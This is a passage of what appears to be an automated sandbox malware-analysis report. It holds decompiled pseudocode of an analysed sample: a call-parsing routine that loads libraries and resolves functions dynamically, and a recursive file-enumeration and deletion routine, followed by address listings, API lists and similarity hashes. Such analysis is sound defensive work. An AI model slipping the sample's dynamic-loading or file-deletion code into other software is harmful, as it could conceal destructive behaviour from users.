								_t317 = _t245;
								 *(_t317 + 0x810) = _t283;
								 *(_t317 + 0x814) = _t283;
							}
							_t287 = _v36;
							_t207 = _t317 + 8;
							_t44 = _t317 + 0x408; // 0x408
							_t309 = _t44;
							 *_t317 = _t287;
							 *_t207 =  *_t207 & 0x00000000;
							 *(_t317 + 0x808) = _t283;
							 *_t309 =  *_t309 & 0x00000000;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *(_t317 + 0x80c) = _t283;
							 *(_t317 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t315 = 0;
								GlobalFree(_t317);
								_t317 = E100012FE(_v24);
								__eflags = _t317 - _t283;
								if(_t317 == _t283) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t239 =  *(_t317 + 0x14a0);
									__eflags = _t239 - _t283;
									if(_t239 == _t283) {
										break;
									}
									_t315 = _t317;
									_t317 = _t239;
									__eflags = _t317 - _t283;
									if(_t317 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t315 - _t283;
								if(_t315 != _t283) {
									 *(_t315 + 0x14a0) = _t283;
								}
								_t240 =  *(_t317 + 0x810);
								__eflags = _t240 & 0x00000008;
								if((_t240 & 0x00000008) == 0) {
									_t241 = _t240 | 0x00000002;
									__eflags = _t241;
									 *(_t317 + 0x810) = _t241;
								} else {
									_t317 = E10001534(_t317);
									 *(_t317 + 0x810) =  *(_t317 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L28:
									lstrcpyA(_t207, _v44);
									L29:
									lstrcpyA(_t309, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t308 = _v12;
										continue;
									}
									break;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L29;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t205 != 1) {
							goto L39;
						}
						_t247 = _v16;
						if(_v40 == _t283) {
							_t247 = _t247 - 1;
						}
						 *(_t317 + 0x814) = _t247;
						goto L39;
					}
					_t248 = _t203 - 0x23;
					if(_t248 == 0) {
						__eflags = _t308 - _v52;
						if(_t308 <= _v52) {
							L15:
							_v32 = _t283;
							_v36 = _t283;
							goto L17;
						}
						__eflags =  *((char*)(_t308 - 1)) - 0x3a;
						if( *((char*)(_t308 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							L40:
							_t250 = _v32 - _t283;
							__eflags = _t250;
							if(_t250 == 0) {
								__eflags = _t307 - 0x2a;
								if(_t307 == 0x2a) {
									_v36 = 2;
									L61:
									_t308 = _v12;
									_v28 = _v24;
									_t283 = 0;
									__eflags = 0;
									L62:
									_t316 = _t308 + 1;
									__eflags = _t316;
									_v12 = _t316;
									goto L63;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 == 0x2d) {
									L132:
									_t252 = _t308 + 1;
									__eflags =  *_t252 - 0x3e;
									if( *_t252 != 0x3e) {
										L134:
										_t252 = _t308 + 1;
										__eflags =  *_t252 - 0x3a;
										if( *_t252 != 0x3a) {
											L141:
											_v28 =  &(_v28[1]);
											 *_v28 = _t307;
											goto L62;
										}
										__eflags = _t307 - 0x2d;
										if(_t307 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t252;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L61;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t307 - 0x3a;
								if(_t307 != 0x3a) {
									goto L141;
								}
								__eflags = _t307 - 0x2d;
								if(_t307 != 0x2d) {
									goto L134;
								}
								goto L132;
							}
							_t258 = _t250 - 1;
							__eflags = _t258;
							if(_t258 == 0) {
								L74:
								_t259 = _t286 - 0x22;
								__eflags = _t259 - 0x55;
								if(_t259 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t259 + 0x1000215a) & 0x000000ff) * 4 +  &M100020F6))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											L115:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L120:
												 *__eax =  *__eax & 0x00000000;
												__ebx = E10001224(_v24);
												goto L91;
											}
											L116:
											__eflags = __cl;
											if(__cl == 0) {
												goto L120;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 1;
										__ebx = E10001215();
										 &_v12 = E100019FB( &_v12);
										__eax = E10001429(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push("true");
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push("true");
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x818) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x828) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E100019FB( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t133 = _v16 + 0x41; // 0x41
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t261 =  *(_t317 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E100019FB( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x82c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x830; // 0x830
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t262 = _t258 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t283;
								goto L74;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L141;
							}
							_t265 = _t286 - 0x21;
							__eflags = _t265;
							if(_t265 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t266 = _t265 - 0x42;
							__eflags = _t266;
							if(_t266 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t317 + 0x810;
									 *_t92 =  *(_t317 + 0x810) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t317 + 0x810) =  *(_t317 + 0x810) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t271 = _t266;
							__eflags = _t271;
							if(_t271 == 0) {
								_push("true");
								L56:
								_pop(1);
								goto L57;
							}
							_t272 = _t271 - 9;
							__eflags = _t272;
							if(_t272 == 0) {
								_push("true");
								goto L56;
							}
							_t273 = _t272 - 4;
							__eflags = _t273;
							if(_t273 == 0) {
								_push("true");
								goto L56;
							}
							_t274 = _t273 - 1;
							__eflags = _t274;
							if(_t274 == 0) {
								_push("true");
								goto L56;
							}
							__eflags = _t274 != 0;
							if(_t274 != 0) {
								goto L61;
							}
							_push("true");
							goto L56;
						}
						goto L15;
					}
					_t277 = _t248 - 5;
					if(_t277 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t283;
						_v20 = _t283;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t283;
						goto L17;
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						_v32 = 2;
						_v8 = _t283;
						_v20 = _t283;
						goto L17;
					}
					if(_t281 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t317 == _t283 ||  *(_t317 + 0x80c) != _t283) {
					L161:
					return _t317;
				} else {
					_t215 =  *_t317 - 1;
					if(_t215 == 0) {
						_t311 = _t317 + 8;
						__eflags =  *_t311;
						if( *_t311 != 0) {
							_t216 = GetModuleHandleA(_t311);
							__eflags = _t216 - _t283;
							 *(_t317 + 0x808) = _t216;
							if(_t216 != _t283) {
								L150:
								_t183 = _t317 + 0x408; // 0x408
								_t312 = _t183;
								_t217 = E100015A4( *(_t317 + 0x808), _t312);
								__eflags = _t217 - _t283;
								 *(_t317 + 0x80c) = _t217;
								if(_t217 == _t283) {
									__eflags =  *_t312 - 0x23;
									if( *_t312 == 0x23) {
										_t186 = _t317 + 0x409; // 0x409
										_t221 = E100012FE(_t186);
										__eflags = _t221 - _t283;
										if(_t221 != _t283) {
											__eflags = _t221 & 0xffff0000;
											if((_t221 & 0xffff0000) == 0) {
												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t283;
								if(_v48 != _t283) {
									L157:
									_t312[lstrlenA(_t312)] = 0x41;
									_t219 = E100015A4( *(_t317 + 0x808), _t312);
									__eflags = _t219 - _t283;
									if(_t219 != _t283) {
										L145:
										 *(_t317 + 0x80c) = _t219;
										goto L161;
									}
									__eflags =  *(_t317 + 0x80c) - _t283;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t196 = _t317 + 4;
									 *_t196 =  *(_t317 + 4) | 0xffffffff;
									__eflags =  *_t196;
									goto L161;
								} else {
									__eflags =  *(_t317 + 0x80c) - _t283;
									if( *(_t317 + 0x80c) != _t283) {
										goto L161;
									}
									goto L157;
								}
							}
							_t224 = LoadLibraryA(_t311); // executed
							__eflags = _t224 - _t283;
							 *(_t317 + 0x808) = _t224;
							if(_t224 == _t283) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t317 + 0x408; // 0x408
						_t226 = E100012FE(_t179);
						 *(_t317 + 0x80c) = _t226;
						__eflags = _t226 - _t283;
						goto L159;
					}
					_t227 = _t215 - 1;
					if(_t227 == 0) {
						_t176 = _t317 + 0x408; // 0x408
						_t228 = _t176;
						__eflags =  *_t228;
						if( *_t228 == 0) {
							goto L161;
						}
						_t219 = E100012FE(_t228);
						L144:
						goto L145;
					}
					if(_t227 != 1) {
						goto L161;
					}
					_t284 = _t317 + 8;
					_t313 = E100012FE(_t317 + 8);
					 *(_t317 + 0x808) = _t313;
					if(_t313 == 0) {
						goto L160;
					}
					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t317 + 0x848)) = 1;
					 *((intOrPtr*)(_t317 + 0x838)) = 1;
					_t89 = _t317 + 0x408; // 0x408
					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
					goto L144;
				}
			}

0x10001a65
0x10001a68
0x10001a6b
0x10001a6e
0x10001a71
0x10001a74
0x10001a77
0x10001a79
0x10001a7c
0x10001a81
0x10001a84
0x10001a8c
0x10001a94
0x10001a96
0x10001a99
0x10001aa1
0x10001aa1
0x10001aa6
0x10001aa9
0x00000000
0x00000000
0x10001ab3
0x10001ab5
0x10001aba
0x10001abc
0x10001b2e
0x10001b2e
0x10001b2e
0x10001b32
0x10001b35
0x10001b37
0x10001b59
0x10001b5c
0x10001b5e
0x10001b67
0x10001b6d
0x10001b6f
0x10001b75
0x10001b75
0x10001b7b
0x10001b7e
0x10001b81
0x10001b81
0x10001b87
0x10001b89
0x10001b8c
0x10001b92
0x10001b95
0x10001b95
0x10001b97
0x10001b9d
0x10001ba0
0x10001bc4
0x10001bc7
0x00000000
0x00000000
0x10001bca
0x10001bcc
0x10001bda
0x10001bdd
0x10001bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x10001be1
0x10001be1
0x10001be1
0x10001be7
0x10001be9
0x00000000
0x00000000
0x10001beb
0x10001bed
0x10001bef
0x10001bf1
0x00000000
0x00000000
0x00000000
0x10001bf1
0x10001bf3
0x10001bf5
0x10001bf7
0x10001bf7
0x10001bfd
0x10001c03
0x10001c05
0x10001c19
0x10001c19
0x10001c1b
0x10001c07
0x10001c0d
0x10001c10
0x10001c10
0x00000000
0x10001ba2
0x10001ba2
0x10001ba2
0x10001ba3
0x10001bab
0x10001baf
0x10001bb5
0x10001bb9
0x10001c21
0x10001c24
0x10001c27
0x10001cb1
0x10001cb5
0x10001a9e
0x00000000
0x10001a9e
0x00000000
0x10001cb5
0x10001ba5
0x10001ba5
0x10001ba6
0x00000000
0x00000000
0x10001ba8
0x10001ba9
0x00000000
0x00000000
0x00000000
0x10001ba9
0x10001ba0
0x10001b3a
0x00000000
0x00000000
0x10001b43
0x10001b46
0x10001b53
0x10001b53
0x10001b48
0x00000000
0x10001b48
0x10001abe
0x10001ac1
0x10001b12
0x10001b15
0x10001b26
0x10001b26
0x10001b29
0x00000000
0x10001b29
0x10001b17
0x10001b1b
0x00000000
0x00000000
0x10001b1d
0x10001b20
0x10001c2f
0x10001c32
0x10001c32
0x10001c34
0x10001f7a
0x10001f7d
0x10001fe0
0x10001ca2
0x10001ca5
0x10001ca8
0x10001cab
0x10001cab
0x10001cad
0x10001cad
0x10001cad
0x10001cae
0x00000000
0x10001cae
0x10001f7f
0x10001f82
0x10001f8e
0x10001f8e
0x10001f91
0x10001f94
0x10001f9f
0x10001f9f
0x10001fa2
0x10001fa5
0x10001fec
0x10001fef
0x10001ff2
0x00000000
0x10001ff2
0x10001fa7
0x10001faa
0x00000000
0x00000000
0x10001fac
0x10001fb3
0x10001fb3
0x10001fb9
0x10001fbc
0x10001fd8
0x10001fbe
0x10001fc7
0x10001fca
0x10001fca
0x00000000
0x10001fbc
0x10001f96
0x00000000
0x10001f96
0x10001f84
0x10001f87
0x00000000
0x00000000
0x10001f89
0x10001f8c
0x00000000
0x00000000
0x00000000
0x10001f8c
0x10001c3a
0x10001c3a
0x10001c3b
0x10001d6a
0x10001d6a
0x10001d6f
0x10001d72
0x00000000
0x00000000
0x10001d7f
0x00000000
0x10001f22
0x10001f25
0x10001f28
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x10001f32
0x10001f32
0x10001f35
0x10001f47
0x10001f4a
0x10001f53
0x00000000
0x10001f53
0x10001f37
0x10001f37
0x10001f39
0x00000000
0x00000000
0x10001f3b
0x10001f3d
0x10001f3f
0x10001f3f
0x10001f3f
0x10001f40
0x10001f42
0x10001f44
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x00000000
0x10001f30
0x00000000
0x10001dc6
0x00000000
0x00000000
0x10001dd2
0x00000000
0x00000000
0x10001db9
0x10001dbd
0x10001dc1
0x00000000
0x00000000
0x10001ef4
0x10001ef8
0x00000000
0x00000000
0x10001efe
0x10001f06
0x10001f0d
0x10001f15
0x00000000
0x00000000
0x10001e91
0x10001e91
0x00000000
0x00000000
0x10001ddb
0x00000000
0x00000000
0x10001f72
0x00000000
0x00000000
0x10001f62
0x00000000
0x00000000
0x10001f66
0x00000000
0x00000000
0x10001f6e
0x00000000
0x00000000
0x10001eb4
0x00000000
0x00000000
0x10001e99
0x10001e9b
0x00000000
0x00000000
0x10001ebc
0x00000000
0x00000000
0x10001ea1
0x00000000
0x00000000
0x10001ea5
0x00000000
0x00000000
0x10001f6a
0x10001f74
0x10001f74
0x00000000
0x00000000
0x10001ec4
0x10001ec8
0x10001ecd
0x10001ed0
0x10001ed1
0x10001ed4
0x10001eda
0x10001eda
0x00000000
0x00000000
0x10001f5a
0x00000000
0x00000000
0x10001ea9
0x10001eac
0x10001eae
0x00000000
0x00000000
0x10001de2
0x10001de2
0x00000000
0x00000000
0x10001eb8
0x10001ebe
0x10001ebe
0x10001de4
0x10001de4
0x10001de7
0x10001dee
0x10001df1
0x10001df3
0x10001df5
0x10001df6
0x10001dfa
0x10001dfd
0x10001e03
0x10001e09
0x10001e09
0x10001e0b
0x10001e0b
0x10001e0e
0x10001e14
0x10001e16
0x10001e1a
0x10001e1f
0x10001e1f
0x10001e21
0x10001e21
0x10001e24
0x10001e27
0x10001e30
0x10001e33
0x10001e36
0x10001e36
0x10001e38
0x10001e3b
0x10001e41
0x00000000
0x10001e41
0x10001e05
0x10001e07
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d86
0x10001d8c
0x10001d8f
0x10001d91
0x10001d91
0x10001d94
0x10001d98
0x10001da5
0x10001da7
0x10001dad
0x10001dad
0x10001dad
0x00000000
0x00000000
0x10001ee2
0x10001ee6
0x10001eeb
0x10001eee
0x10001e47
0x10001e47
0x10001e49
0x00000000
0x00000000
0x10001e4f
0x10001e4f
0x10001e53
0x10001e5a
0x10001e7e
0x10001e7e
0x10001e82
0x10001e84
0x10001e87
0x10001e87
0x10001e8a
0x10001e8a
0x00000000
0x10001e82
0x10001e5f
0x10001e62
0x10001e62
0x10001e69
0x10001e6b
0x10001e6e
0x10001e75
0x10001e76
0x10001e7c
0x10001e7c
0x00000000
0x10001e7c
0x10001e70
0x10001e73
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d7f
0x10001c41
0x10001c41
0x10001c42
0x10001d67
0x00000000
0x10001d67
0x10001c48
0x10001c49
0x00000000
0x00000000
0x10001c51
0x10001c51
0x10001c54
0x10001c9f
0x00000000
0x10001c9f
0x10001c56
0x10001c56
0x10001c59
0x10001c83
0x10001c86
0x10001c89
0x10001d59
0x10001d59
0x10001d59
0x10001c8f
0x10001c8f
0x10001c8f
0x10001d5f
0x00000000
0x10001d5f
0x10001c5c
0x10001c5c
0x10001c5d
0x10001c80
0x10001c82
0x10001c82
0x00000000
0x10001c82
0x10001c5f
0x10001c5f
0x10001c62
0x10001c7c
0x00000000
0x10001c7c
0x10001c64
0x10001c64
0x10001c67
0x10001c78
0x00000000
0x10001c78
0x10001c69
0x10001c69
0x10001c6a
0x10001c74
0x00000000
0x10001c74
0x10001c6d
0x10001c6e
0x00000000
0x00000000
0x10001c70
0x00000000
0x10001c70
0x00000000
0x10001b20
0x10001ac3
0x10001ac6
0x10001af5
0x10001af9
0x10001b00
0x10001b07
0x10001b0a
0x10001b0d
0x00000000
0x10001b0d
0x10001ac8
0x10001ac9
0x10001ae4
0x10001aeb
0x10001aee
0x00000000
0x10001aee
0x10001ace
0x00000000
0x10001ad4
0x10001ad4
0x10001adb
0x00000000
0x10001adb
0x10001ace
0x10001cc4
0x10001cc9
0x10001cce
0x10001cd2
0x100020ef
0x100020f5
0x10001ce4
0x10001ce6
0x10001ce7
0x1000201a
0x1000201d
0x10002020
0x1000203d
0x10002043
0x10002045
0x1000204b
0x10002062
0x10002062
0x10002062
0x1000206f
0x10002075
0x10002078
0x1000207e
0x10002080
0x10002083
0x10002085
0x1000208c
0x10002091
0x10002094
0x10002096
0x1000209b
0x100020ad
0x100020ad
0x1000209b
0x10002094
0x10002083
0x100020b3
0x100020b6
0x100020c0
0x100020c8
0x100020d4
0x100020da
0x100020dd
0x1000200f
0x1000200f
0x00000000
0x1000200f
0x100020e3
0x100020e9
0x100020e9
0x00000000
0x00000000
0x100020eb
0x100020eb
0x100020eb
0x100020eb
0x00000000
0x100020b8
0x100020b8
0x100020be
0x00000000
0x00000000
0x00000000
0x100020be
0x100020b6
0x1000204e
0x10002054
0x10002056
0x1000205c
0x00000000
0x00000000
0x00000000
0x1000205c
0x10002022
0x10002029
0x1000202f
0x10002035
0x00000000
0x10002035
0x10001ced
0x10001cee
0x10001ff9
0x10001ff9
0x10001fff
0x10002002
0x00000000
0x00000000
0x10002009
0x1000200e
0x00000000
0x1000200e
0x10001cf5
0x00000000
0x00000000
0x10001cfb
0x10001d04
0x10001d09
0x10001d0f
0x00000000
0x00000000
0x10001d15
0x10001d22
0x10001d28
0x10001d32
0x10001d38
0x10001d40
0x10001d50
0x00000000
0x10001d50

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNELBASE(?,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040562F Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040562F(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E004058ED(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x423788 =  *0x423788 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405D8D(0x420d10, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405846(_t73);
					} else {
						lstrcatA(0x420d10, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x409014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x420d10,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E0040582A( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405D8D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004055E7(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404FA6(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x423788 =  *0x423788 + 1;
										} else {
											E00404FA6(0xfffffff1, _t73);
											E00405C48(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040562F(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x420d10 - 0x5c;
					if( *0x420d10 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406091(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E004057FF(_t73);
							_t40 = E004055E7(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00404FA6(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404FA6(0xfffffff1, _t73);
							return E00405C48(_t72, _t73, 0);
						}
						L33:
						 *0x423788 =  *0x423788 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405639
0x0040563e
0x00405647
0x0040564a
0x00405652
0x00405655
0x00405658
0x00405660
0x00405662
0x00405663
0x00000000
0x00405663
0x0040566e
0x00405671
0x00405671
0x00405671
0x00405675
0x00405688
0x0040568f
0x00405694
0x00405698
0x004056a8
0x0040569a
0x004056a0
0x004056a0
0x004056ad
0x004056b0
0x004056bb
0x004056c1
0x004056c6
0x004056d6
0x004056d8
0x004056de
0x004056e1
0x004056e4
0x0040579c
0x0040579c
0x004057a0
0x004057a2
0x004057a2
0x004057a2
0x004057a2
0x00000000
0x00000000
0x00000000
0x00000000
0x004056ea
0x004056ea
0x004056f3
0x004056f9
0x004056fe
0x00405701
0x00405703
0x00405707
0x00405709
0x00405709
